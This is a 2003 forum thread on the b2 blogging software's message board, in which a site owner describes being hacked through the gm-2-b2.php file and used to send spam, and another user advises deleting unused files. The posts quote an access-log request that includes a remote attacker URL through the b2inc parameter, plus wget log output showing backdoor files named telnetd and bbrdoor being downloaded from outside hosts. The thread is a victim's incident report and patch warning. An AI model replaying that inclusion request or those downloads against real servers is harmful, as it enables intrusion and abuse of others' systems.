 |
boardom
b2 message board
|
| View previous topic :: View next topic |
| Author |
Message |
dep21
Joined: 09 Oct 2003
Posts: 2
|
 Posted: Thu Oct 09, 2003 5:10 pm Post subject: Hacked and used as a spammers b*tch! |
 |
|
Hello folks,
I've just been hacked via my b2 software. I hadn't been keeping up with development of b2 and hence missed these security updates:
http://tidakada.com/board/viewtopic.php?t=3212&highlight=hacked
On Tuesday, I started getting oodles of 'Mail Delivery Failures' from AOL. Someone had been forging my domain on spams. This has happened to me before - very easy to do, after all - so I sat back and waited for it all to stop.
Today, in a compeltely unrelated incident, I happened across this document, which relates someone's experience of being hacked by a spammer and used to send unwanted email (not using b2, though):
http://www.linuxsecurity.com/articles/privacy_article-8082.html
Towards the end of that article, he mentions finding a similar b2 exploit. Interested, but not connecting it to all the spam as yet (been a long day, synapses not firing properly), I though I'd browse my access logs and error log and see if I could see anything - more just to browse through the logs than expecting to see anything. And then I see this in my error log:
| Quote: |
--22:41:46-- http://www.zueirareri.hpg.com.br/telnetd
=> `telnetd'
Resolving www.zueirareri.hpg.com.br... done.
Connecting to www.zueirareri.hpg.com.br[200.226.137.9]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.zueirareri.hpg.ig.com.br/telnetd [following]
--22:41:47-- http://www.zueirareri.hpg.ig.com.br/telnetd
=> `telnetd'
Resolving www.zueirareri.hpg.ig.com.br... done.
Connecting to www.zueirareri.hpg.ig.com.br[200.222.209.203]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 170,613 [text/plain]
0K .......... .......... .......... .......... .......... 30% 34.34 KB/s
50K ...... 34% 6.60 MB/s
22:56:50 (38.96 KB/s) - Read error at byte 58120/170613 (Connection timed out). Retrying.
--22:56:50-- http://www.zueirareri.hpg.ig.com.br/telnetd
(try: 2) => `telnetd'
Connecting to www.zueirareri.hpg.ig.com.br[200.222.209.203]:80... connected.
HTTP request sent, awaiting response... 206 Partial Content
Length: 170,613 (112,493 to go) [text/plain]
[ skipping 50K ]
50K ,,,,,,.... .......... .......... .......... .......... 60% 29.86 KB/s
100K .......... .......... .......... .......... .......... 90% 133.33 KB/s
150K .......... ...... 100% 40.23 KB/s
22:56:53 (49.13 KB/s) - `telnetd' saved [170613/170613]
--22:56:54-- http://dede987.tripod.com/bbrdoor
=> `bbrdoor'
Resolving dede987.tripod.com... done.
Connecting to dede987.tripod.com[209.202.196.70]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
0K .......... ........ 92.74 KB/s
22:56:55 (92.74 KB/s) - `bbrdoor' saved [18803]
|
Lord knows what that's doing in my error log, but hey... Anyway, that got me just a teensy worried. I then found three files in my /tmp/ directory - two telnet daemons and the bbrdoor file.
So I check my access log for Tuesday, just before the activity above. And I find:
200.163.90.122 - - [07/Oct/2003:23:50:57 -0600] "GET /b2-tools/gm-2-b2.php?b2inc=http://dedezao.tripod.com HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 9 "
Oh sh*t, I think. I've been hacked. So I wander on over here and find the above security announcement and rather quickly update my b2 software.
So, in case anyone HASN'T updated their b2 stuff, DO IT NOW. Because someone out there is searching for b2 blogs that haven't been patched, and they're using it for spam. I'm just lucky in one sense that this was a spammer and not someone who wanted to mess around with all my files... And if there are any other holes in the software, please let me know!
By the way, the Tripod site is dead, but the www.zueirareri.hpg.ig.com.br web site is still there. |
|
| Back to top |
|
 |
Viper007Bond
Joined: 15 Aug 2003
Posts: 266
Location: Portland, Oregon, USA
|
| Posted: Thu Oct 09, 2003 6:07 pm Post subject: |
|
|
Why not just delete the file gm-2-b2.php and all of the other files you don't use?
_________________
http://www.viper007bond.com
If you haven't already installed b2, I advise you look into WordPress or b2evo instead as b2 is dead. |
|
| Back to top |
|
|
dep21
Joined: 09 Oct 2003
Posts: 2
|
| Posted: Thu Oct 09, 2003 9:43 pm Post subject: |
|
|
| Viper007Bond wrote: | | Why not just delete the file gm-2-b2.php and all of the other files you don't use? |
Have done that now... I'd not used php before using b2, so wasn't sure after installation which files were necessary and which weren't. The gm-2 file has now bitten the dust. |
|
| Back to top |
|
|
|
|
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
Powered by phpBB 2 © 2001, 2002 phpBB Group
|
FAQ
Search
Memberlist
Usergroups
Register
Profile
Log in to check your private messages
Log in
